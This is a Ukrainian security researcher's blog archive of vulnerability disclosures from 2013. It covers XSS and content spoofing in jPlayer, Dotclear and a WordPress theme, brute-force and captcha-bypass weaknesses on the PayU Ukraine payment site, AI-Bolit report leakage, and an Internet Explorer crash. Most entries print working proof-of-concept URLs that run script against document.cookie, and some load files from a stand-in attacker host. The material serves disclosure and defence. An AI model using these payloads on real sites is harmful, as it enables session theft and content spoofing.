Архів для категорії 'Уразливості'

XSS та Content Spoofing уразливості в jPlayer

23:55 20.04.2013

14.03.2013

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в jPlayer. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.04.2013

Cross-Site Scripting (WASC-08):

В різних версія jPlayer різні XSS уразливості.

0.2.1 - 1.2.0:

http:/site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.0.0:

http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.1.0:

http:/site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

В версії 2.2.0 ці XSS уразливості вже виправлені. Але Malte Batram (в версії 2.2.19) і я (в версії 2.2.20) виявили нові.

2.2.0 - 2.2.19 (і попередні версії):

Атака працює в Firefox (всі версії та браузери на движку Gecko), IE6 і Opera 10.62.

http:/site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

2.2.20 - 2.2.22 (і попередні версії):

http:/site/Jplayer.swf?jQuery=alert&id=XSS

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Уразливі версії до jPlayer 2.2.23. Версія 2.2.23 і остання версія 2.3.0 не є вразливими до наведених XSS, окрім CS через JS і XSS атак через JS калбеки. Також в версії 2.3.0 працюють інші обхідні методи атаки, які вони не виправили окрім атаки через alert. Про що я вже писав розробникам у березні та нагадав ще раз.

Уразливості в плагінах для WordPress №103

23:53 19.04.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mathjax Latex, podPress та FuneralPress. Для котрих з’явилися експлоіти. Mathjax Latex - це плагін для додання підтримки latex і mathml формул, podPress - це плагін для подкастінга, FuneralPress - це похоронний менеджер та гостьова книга.

  • WordPress Mathjax Latex 1.1 Cross Site Request Forgery (деталі)
  • WordPress podPress 8.8.10.13 Cross Site Scripting (деталі)
  • WordPress FuneralPress 1.1.6 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в темі Colormix для WordPress

23:58 18.04.2013

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

У грудні, 22.12.2012, я знайшов Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Colormix для WordPress. Що аналогічні уразливостям в темах для WP від RocketTheme.

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/colormix/ в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Colormix для WordPress.

Уразливості на www.payu.ua

17:26 18.04.2013

12.12.2012

У листопаді, 05.11.2012, я знайшов Insufficient Anti-automation, Brute Force і Abuse of Functionality уразливості на http://www.payu.ua - сайті системи онлайн платежів PayU. Про що найближчим часом сповіщу адміністрацію сайта.

Як і всі ті сайти платіжних систем власники яких заявляли про відповідність PCI DSS і на яких я знаходив дірки, на сайті www.payu.ua заявлена відповідність PCI DSS. Але їм ще потрібно виправляти чимало уразливостей, щоб цього досягти.

Стосовно дірок на сайтах онлайн магазинів та електронних платіжних систем в останнє я писав про уразливості на www.allmoney.com.ua та plimus.com.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2013

Insufficient Anti-automation:

http://www.payu.ua/zayavka-na-podklyuchenie

Не було захисту від автоматизованих атак. Зараз поставили капчу.

Brute Force:

https://secure.payu.ua/cpanel/

Окрім BF тут ще і CSRF. Капча обходиться видаленням кукіса.

Abuse of Functionality / Insufficient Anti-automation:

https://secure.payu.ua/cpanel/recover_password.php

Витік логінів/емайлів. Капча обходиться видаленням кукіса.

Виправили лише одну IAA уразливість. Всі інші уразливості досі не виправлені.

Уразливості в плагінах для WordPress №102

23:55 16.04.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC FAQS Manager, Level Four Storefront та WP Banners Lite. Для котрих з’явилися експлоіти. IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань, Level Four Storefront - це плагін для створення кошика покупця, WP Banners Lite - це локальна банерна система.

  • WordPress IndiaNIC FAQS Manager 1.0 XSS / CSRF (деталі)
  • WordPress Level Four Storefront SQL Injection (деталі)
  • WP Banners Lite 1.40 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в AI-Bolit

23:55 13.04.2013

22.01.2013

У грудні, 02.12.2012, я виявив Brute Force та Information Leakage уразливості в секюріті додатку AI-Bolit. Про що вже повідомив розробникам веб додатку.

AI-Bolit — це скрипт для пошуку вірусів, троянів, бекдорів та іншої хакерської активності на хостингу.

Детальна інформація про уразливості з’явиться пізніше.

13.04.2013

Brute Force (WASC-11):

http://site/ai-bolit.php?p=1

Information Leakage (WASC-13):

http://site/AI-BOLIT-REPORT.html

http://site/AI-BOLIT-REPORT-<дата>-<час>.html

Витік звітів зі статистикою та FPD. В тому числі такі звіти заіндексовані пошуковими системами. Якщо в звіті показані виявлені на сайті бекдори, то отримавши доступ до звіту, можна дізнатися про бекдори і з їх використанням похакати сайт.

Уразливі всі версії AI-Bolit. У версії 20121014 формат імені файла був змінений (з доданням дати і часу), але його все ще легко підібрати, тому IL уразливість залишилась актуальною. Розробник програми пообіцяв виправити ці уразливості в нових версіях. У версії 20130201 було заборонене індексування звіту та в ім’я файла звіту додається випадкове число (для захисту від підбору імені).

XSS та Content Spoofing уразливості в Dotclear

23:51 12.04.2013

10.01.2013

У листопаді, 13.11.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в Dotclear. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Dotclear.

Детальна інформація про уразливості з’явиться пізніше.

12.04.2013

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

Код виконається після кліку. Це strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Уразливі Dotclear 2.4.4 (і частково 2.5) та попередні версії. В версії Dotclear 2.5 розробники виправили уразливості, але неефективно: по-перше, всі три вразливі флешки наявні в движку (тому з репозиторію чи з сайтів не слід їх брати для використання в своїх проектах, бо це вразливі версії флешек), по-друге, заборона прямого доступу до флешек (через .htaccess), щоб не можна було використати уразливості в них, працює лише на Apache, але не на інших веб серверах (тому сайти на них є вразливими).

Уразливості в плагінах для WordPress №101

23:59 10.04.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Occasions, Count Per Day та IndiaNIC FAQS Manager. Для котрих з’явилися експлоіти. Occasions - це плагін для зміни логотипів по датам, Count Per Day - це плагін для ведення статистики відвідувань, IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань.

  • WordPress Occasions 1.0.4 Cross Site Request Forgery (деталі)
  • WordPress Count Per Day 3.2.5 XSS (деталі)
  • WordPress IndiaNIC FAQS Manager 1.0 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

DoS уразливість в Internet Explorer 6, 7, 8

16:24 10.04.2013

В записі Denial of Service в Internet Explorer я навів відео TheSecuritylab з вибиванням IE7. І 13.02.2013 я розробив експлоіт заснований на даному відео і дослідив дану уразливість в різних браузерах. Як я перевірив, вона також працює в IE6 та IE8.

Тому це Denial of Service уразливість в Internet Explorer 6, 7, 8. Це access violation.

DoS:

Браузер вибиває при рекурсивному включенні css-файла. Це відбувається через access violation (aka segmentation fault) в iexplore.exe. Щоб експлоіт спрацював в IE6 потрібно оновити сторінку.

Експлоіт:

IE_DoS_Exploit.html

Уразливі Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7
(7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) та попередні версії цих браузерів. IE9 не вразливий.

Уразливості на img.com.ua

23:56 09.04.2013

У березні, 28.03.2013, я знайшов Cross-Site Scripting уразливості в банерній мережі http://img.com.ua (на піддоменах). Про що найближчим часом сповіщу адміністрацію проекту.

В 2008-2010 роках я писав про численні банерні системи (українські й закордонні), що мають подібні уразливості. Проблема така ж сама як і випадку уразливостей в системах в phpAdsNew, OpenAds та OpenX.

У флеш банерах на піддоменах bbn.img.com.ua і bbnu.img.com.ua (і потенційно інших піддоменах), є XSS уразливість. Якщо вони зроблені згідно з рекомендаціями банерної системи, то можлива XSS атака (strictly social XSS) через параметр bn_url (при кліку на банер). Про подібну атаку я вже писав в статті XSS уразливості в 8 мільйонах флеш файлах.

XSS:

На всіх піддоменах даного сайта є десятки тисяч флеш банерів. Не всі з них уразливі, є піддомени де жодна флешка не має таких уразливостей, але на зазначених піддоменах всі флешки уразливі.